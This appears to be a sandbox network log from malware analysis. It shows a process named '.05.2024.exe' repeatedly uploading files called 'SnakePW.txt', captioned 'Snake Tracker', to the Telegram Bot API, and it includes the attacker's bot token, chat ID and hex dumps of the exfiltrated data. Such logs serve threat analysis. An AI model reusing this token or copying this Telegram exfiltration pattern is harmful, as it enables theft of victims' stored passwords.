Ascii: {"ok":true,"result":{"message_id":36930,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434463,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	49807	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:24 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfaa80f9e2e7c Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:24 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 61 61 38 30 66 39 65 32 65 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfaa80f9e2e7cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:24 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:24 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:24 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 34 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36931,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434464,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.7	49808	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:25 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfb05d9164ed6 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:25 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 30 35 64 39 31 36 34 65 64 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfb05d9164ed6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:26 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:25 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:26 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 35 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36932,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434465,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	49809	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:26 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfb639c1a34e0 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:26 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 36 33 39 63 31 61 33 34 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfb639c1a34e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:26 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:27 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 36 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36933,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434466,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.7	49810	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:27 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfbbd134a20ab Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:27 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 62 62 64 31 33 34 61 32 30 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfbbd134a20abContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:28 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:28 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:28 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 38 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36934,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434468,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	49811	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:29 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfc21661836e7 Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:29 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 32 31 36 36 31 38 33 36 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfc21661836e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:29 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:29 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:29 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 36 39 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36935,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434469,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	49812	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:30 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfc85c0ec18c4 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
2024-09-27 10:54:30 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 38 35 63 30 65 63 31 38 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfc85c0ec18c4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:30 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:30 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 30 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36936,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434470,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	49813	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:31 UTC	335	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfce6f192956e Host: api.telegram.org Content-Length: 551
2024-09-27 10:54:31 UTC	551	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 63 65 36 66 31 39 32 39 35 36 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 31 36 38 36 35 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 37 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 35 32 3a 30 36 0d 0a 43 6c 69 65 6e 74 20 Data Ascii: --------------------------8dcfce6f192956eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:216865Date and Time: 27/09/2024 / 06:52:06Client
2024-09-27 10:54:31 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 27 Sep 2024 10:54:31 GMT Content-Type: application/json Content-Length: 523 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-09-27 10:54:31 UTC	523	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 36 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 38 33 33 39 35 36 35 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6b 65 6c 6c 65 72 32 30 32 34 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 32 30 39 36 32 32 36 38 37 2c 22 74 69 74 6c 65 22 3a 22 73 6e 65 61 6b 79 4c 4f 47 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 66 61 6c 73 65 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 34 33 34 34 37 31 2c 22 64 6f 63 75 Data Ascii: {"ok":true,"result":{"message_id":36937,"from":{"id":6783395654,"is_bot":true,"first_name":"keller2024","username":"keller2024bot"},"chat":{"id":-4209622687,"title":"sneakyLOG","type":"group","all_members_are_administrators":false},"date":1727434471,"docu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	49814	149.154.167.220	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:54:32 UTC	359	OUT	POST /bot6783395654:AAGHZk1wugh441q673h1nDNWiVYW4p6ewXc/sendDocument?chat_id=-4209622687&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcfd3a5a04b9e9 Host: api.telegram.org Content-Length: 551 Connection: Keep-Alive
